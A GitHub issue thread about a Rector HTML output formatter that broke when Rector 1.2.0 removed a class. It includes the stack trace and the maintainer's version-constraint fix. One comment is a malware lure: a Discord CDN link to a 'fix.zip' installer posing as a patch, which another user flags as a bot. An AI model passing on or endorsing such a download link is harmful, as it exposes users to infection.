### ISSUE TITLE
No longer works with Rector >= 1.2.0

### ISSUE THREAD

**Issue by stevdompl** [matheusab-soft/rector-html-output-formatter#5]
There was a [change](https://github.com/rectorphp/rector/commit/10e64410ff5f360502202a03d1aa317f28d2cf8b) made at [rectorphp/rector](https://github.com/rectorphp/rector) removing `Rector\ChangesReporting\Annotation\RectorsChangelogResolver` class. 

The change landed with version 1.2.0, so your code is no longer compatible with newer Rector versions.

When I run the command `vendor/bin/rector process --output-format=html` I get:

```
PHP Fatal error:  Uncaught ReflectionException: Class Rector\ChangesReporting\Annotation\RectorsChangelogResolver does not exist in /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php:812
Stack trace:
#0 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(812): ReflectionClass->__construct()
#1 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(706): RectorPrefix202408\Illuminate\Container\Container->build()
#2 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(653): RectorPrefix202408\Illuminate\Container\Container->resolve()
#3 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(953): RectorPrefix202408\Illuminate\Container\Container->make()
#4 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(872): RectorPrefix202408\Illuminate\Container\Container->resolveClass()
#5 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(837): RectorPrefix202408\Illuminate\Co in /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php on line 814
Fatal error: Uncaught ReflectionException: Class Rector\ChangesReporting\Annotation\RectorsChangelogResolver does not exist in /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php:812
Stack trace:
#0 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(812): ReflectionClass->__construct()
#1 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(706): RectorPrefix202408\Illuminate\Container\Container->build()
#2 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(653): RectorPrefix202408\Illuminate\Container\Container->resolve()
#3 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(953): RectorPrefix202408\Illuminate\Container\Container->make()
#4 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(872): RectorPrefix202408\Illuminate\Container\Container->resolveClass()
#5 /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php(837): RectorPrefix202408\Illuminate\Co in /var/www/api/vendor/rector/rector/vendor/illuminate/container/Container.php on line 814
```

With such (breaking) change, I would expect them to change the version major, but the damage is already done.

Maybe you should add max Rector version to your `composer.json` for now, until the refactor was prepared?

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by stevdompl** [comment]
The answer above is a bot trying to get you infected – ignore his response.

**Comment by matheusab** [comment]
Damage is already done indeed. Thanks for pointing it out! I'll fix it asap

**Comment by matheusab** [comment]
version 0.4: changed rector constraint to `>=0.19 , < 1.2.0`
version 1.0 will support rector `>= 1.2`
